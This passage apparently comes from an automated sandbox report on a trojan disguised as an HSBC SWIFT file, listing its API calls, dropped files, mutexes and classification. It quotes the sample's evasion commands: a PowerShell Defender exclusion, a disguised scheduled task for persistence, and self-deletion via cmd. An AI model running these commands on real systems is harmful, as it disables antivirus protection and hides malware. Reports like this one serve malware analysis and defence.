          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A10 NtQuerySection,8_2_018D9A10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D95F0 NtQueryInformationFile,8_2_018D95F0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9520 NtWaitForSingleObject,8_2_018D9520
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DAD30 NtSetContextThread,8_2_018DAD30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9560 NtWriteFile,8_2_018D9560
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA710 NtOpenProcessToken,8_2_018DA710
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9730 NtQueryVirtualMemory,8_2_018D9730
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9760 NtOpenProcess,8_2_018D9760
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA770 NtOpenThread,8_2_018DA770
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9770 NtSetInformationFile,8_2_018D9770
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D96D0 NtCreateKey,8_2_018D96D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9610 NtEnumerateValueKey,8_2_018D9610
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9650 NtQueryValueKey,8_2_018D9650
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9670 NtQueryInformationProcess,8_2_018D9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459540 NtReadFile,LdrInitializeThunk,20_2_05459540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054595D0 NtClose,LdrInitializeThunk,20_2_054595D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459710 NtQueryInformationToken,LdrInitializeThunk,20_2_05459710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459FE0 NtCreateMutant,LdrInitializeThunk,20_2_05459FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459780 NtMapViewOfSection,LdrInitializeThunk,20_2_05459780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459650 NtQueryValueKey,LdrInitializeThunk,20_2_05459650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_05459660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054596D0 NtCreateKey,LdrInitializeThunk,20_2_054596D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_054596E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_05459910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054599A0 NtCreateSection,LdrInitializeThunk,20_2_054599A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459840 NtDelayExecution,LdrInitializeThunk,20_2_05459840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,20_2_05459860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459A50 NtCreateFile,LdrInitializeThunk,20_2_05459A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459560 NtWriteFile,20_2_05459560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459520 NtWaitForSingleObject,20_2_05459520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0545AD30 NtSetContextThread,20_2_0545AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054595F0 NtQueryInformationFile,20_2_054595F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459760 NtOpenProcess,20_2_05459760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0545A770 NtOpenThread,20_2_0545A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459770 NtSetInformationFile,20_2_05459770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0545A710 NtOpenProcessToken,20_2_0545A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459730 NtQueryVirtualMemory,20_2_05459730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054597A0 NtUnmapViewOfSection,20_2_054597A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459670 NtQueryInformationProcess,20_2_05459670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459610 NtEnumerateValueKey,20_2_05459610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459950 NtQueueApcThread,20_2_05459950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054599D0 NtCreateProcessEx,20_2_054599D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0545B040 NtSuspendThread,20_2_0545B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459820 NtEnumerateKey,20_2_05459820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054598F0 NtReadVirtualMemory,20_2_054598F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054598A0 NtWriteVirtualMemory,20_2_054598A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459B00 NtSetValueKey,20_2_05459B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0545A3B0 NtGetContextThread,20_2_0545A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459A00 NtProtectVirtualMemory,20_2_05459A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459A10 NtQuerySection,20_2_05459A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459A20 NtResumeThread,20_2_05459A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459A80 NtOpenDirectoryObject,20_2_05459A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E485D0 NtCreateFile,20_2_00E485D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E48680 NtReadFile,20_2_00E48680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E487B0 NtAllocateVirtualMemory,20_2_00E487B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E48700 NtClose,20_2_00E48700
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E486FB NtClose,20_2_00E486FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E487AA NtAllocateVirtualMemory,20_2_00E487AA
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000000.343003231.0000000000C6E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.386918351.0000000006480000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476069084.0000000000F0E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.478771184.0000000001B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exeBinary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: RdffGefdbLSx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile read: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe:Zone.IdentifierJump to behavior
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmpJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile created: C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4EB8.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/12@0/0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4532:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeMutant created: \Sessions\1\BaseNamedObjects\GJVbibhyPBlryhb
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: /UnmanagedMemoryAccess;component/views/addbook.xaml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: views/addbook.baml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: /UnmanagedMemoryAccess;component/views/addcustomer.xaml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: /UnmanagedMemoryAccess;component/views/addbook.xaml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: views/addbook.baml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: /UnmanagedMemoryAccess;component/views/addcustomer.xaml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: g/UnmanagedMemoryAccess;component/views/addbook.xaml}/UnmanagedMemoryAccess;component/views/borrowfrombookview.xamls/UnmanagedMemoryAccess;component/views/borrowingview.xamlm/UnmanagedMemoryAccess;component/views/changebook.xamlu/UnmanagedMemoryAccess;component/views/changecustomer.xamlq/UnmanagedMemoryAccess;component/views/customerview.xamlu/UnmanagedMemoryAccess;component/views/deletecustomer.xamlk/UnmanagedMemoryAccess;component/views/errorview.xamlo/UnmanagedMemoryAccess;component/views/smallextras.xamlo/UnmanagedMemoryAccess;component/views/addcustomer.xaml
          Source: HSBC_SWIFT-20-11-2021.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC_SWIFT-20-11-2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC_SWIFT-20-11-2021.exe, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: HSBC_SWIFT-20-11-2021.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: RdffGefdbLSx.exe.0.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC_SWIFT-20-11-2021.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC_SWIFT-20-11-2021.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.ea0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C09347 push ds; ret 0_2_00C0934C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C09361 push ds; retf 0_2_00C09364
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_00C092F5 push ds; ret 0_2_00C09340
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 0_2_057856E0 push esp; iretd 0_2_057856E9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B87C push eax; ret 8_2_0041B882
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B812 push eax; ret 8_2_0041B818
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B81B push eax; ret 8_2_0041B882
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B234 push 00000055h; iretd 8_2_0041B236
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004154CA pushfd ; retf 8_2_004154D3
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0041B7C5 push eax; ret 8_2_0041B818
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA92F5 push ds; ret 8_2_00EA9340
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA9361 push ds; retf 8_2_00EA9364
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00EA9347 push ds; ret 8_2_00EA934C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018ED0D1 push ecx; ret 8_2_018ED0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0546D0D1 push ecx; ret 20_2_0546D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B87C push eax; ret 20_2_00E4B882
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B812 push eax; ret 20_2_00E4B818
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B81B push eax; ret 20_2_00E4B882
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B234 push 00000055h; iretd 20_2_00E4B236
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E454CA pushfd ; retf 20_2_00E454D3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_00E4B7C5 push eax; ret 20_2_00E4B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85580215694
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85580215694
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeFile created: C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
